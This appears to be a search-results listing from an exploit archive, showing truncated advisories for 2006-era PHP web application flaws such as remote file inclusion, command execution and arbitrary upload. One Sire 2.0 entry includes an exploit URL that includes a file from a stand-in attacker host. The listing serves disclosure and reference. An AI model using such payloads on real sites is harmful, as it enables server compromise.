5285 matches found
SimpleBBS 1.0.61.0.71.1 - Arbitrary Command Execution
SimpleBBS 1.0.61.0.71.1 - Arbitrary Command Execution source: https://www.securityfocus.com/bid/17501/info SimpleBBS is prone to an arbitrary command-execution vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this...
AzDGVote - Remote File Inclusion
source: https://www.securityfocus.com/bid/17447/info AzDGVote is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containing malicious PH...
Indexu 5.0 - Multiple Remote File Inclusions
Indexu 5.0 - Multiple Remote File Inclusions source: https://www.securityfocus.com/bid/17470/info The 'indexu' application is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker can explo...
AzDGVote - Remote File Inclusion
AzDGVote - Remote File Inclusion source: https://www.securityfocus.com/bid/17447/info AzDGVote is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary...
SPIP 1.8.3 - 'Spip_login.php' Remote File Inclusion
source: https://www.securityfocus.com/bid/17423/info SPIP is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP co...
SIRE 2.0 - Arbitrary File Upload
source: https://www.securityfocus.com/bid/17431/info SIRE is prone to an arbitrary file-upload vulnerability. An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation...
SPIP 1.8.3 - Spip_login.php Remote File Inclusion
SPIP 1.8.3 - Spiplogin.php Remote File Inclusion source: https://www.securityfocus.com/bid/17423/info SPIP is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include an...
XSS Bug in Cherokee Webserver
Tuesday 4 of April of 2006, I have detected that it is possible to mount an attack of the type Cross Site Scripting XSS in cherokee-0.5.0 and all previous versions. The problem resides, when introducing code HTML in the URL. Because previously, it was let now of a seemed failure, from version 0.4...
Sire 2.0 - lire.php Remote File Inclusion Arbitrary File Upload
Sire 2.0 - lire.php Remote File Inclusion Arbitrary File Upload +File Inclusion: Input passed to the "rub" parameter in "lire.php" isn't properly verified, before it is used to include remote files Successful exploitation requires that "registerglobals" is enabled. lire.php code +Exploit: Exploit...
Sire 2.0 - '/lire.php' Remote File Inclusion / Arbitrary File Upload
+File Inclusion: Input passed to the "rub" parameter in "lire.php" isn't properly verified, before it is used to include remote files Successful exploitation requires that "registerglobals" is enabled. lire.php code +Exploit: Exploit http://trajet/lire.php?rub=http://attacker&cahier=1&art=1...
Warcraft III Replay Parser for PHP 1.8.c - 'index.php' Remote File Inclusion
source: https://www.securityfocus.com/bid/17334/info Warcraft III Replay Parser for PHP is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote fi...
Warcraft III Replay Parser for PHP 1.8.c - index.php Remote File Inclusion
Warcraft III Replay Parser for PHP 1.8.c - index.php Remote File Inclusion source: https://www.securityfocus.com/bid/17334/info Warcraft III Replay Parser for PHP is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied...
MediaSlash Gallery - index.php Remote File Inclusion
MediaSlash Gallery - index.php Remote File Inclusion source: https://www.securityfocus.com/bid/17323/info MediaSlash Gallery is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this...
MediaSlash Gallery - 'index.php' Remote File Inclusion
source: https://www.securityfocus.com/bid/17323/info MediaSlash Gallery is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containing...
VihorDesign - index.php Remote File Inclusion
VihorDesign - index.php Remote File Inclusion source: https://www.securityfocus.com/bid/17227/info VihorDesign is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include...
VihorDesign - 'index.php' Remote File Inclusion
source: https://www.securityfocus.com/bid/17227/info VihorDesign is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containing malicious...
Core News 2.0.1 - index.php Remote Code Execution
Core News 2.0.1 - index.php Remote Code Execution source: https://www.securityfocus.com/bid/17067/info Core News is prone to a code-execution vulnerability. An attacker can exploit this issue to execute arbitrary malicious PHP code and execute it in the context of the webserver process. This may...
Core News 2.0.1 - 'index.php' Remote Code Execution
source: https://www.securityfocus.com/bid/17067/info Core News is prone to a code-execution vulnerability. An attacker can exploit this issue to execute arbitrary malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the...
LoudBlog 0.41 - 'index.php?template' Traversal Arbitrary File Access
source: https://www.securityfocus.com/bid/17023/info Loudblog is prone to multiple input-validation vulnerabilities: - An SQL-injection vulnerability. - Two local file-include vulnerabilities. - An information-disclosure vulnerability. These issues allow remote attackers to execute arbitrary PHP...
PHORUM 3.x5.x - Common.php Remote File Inclusion
PHORUM 3.x5.x - Common.php Remote File Inclusion source: https://www.securityfocus.com/bid/16977/info The PHORUM application is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this...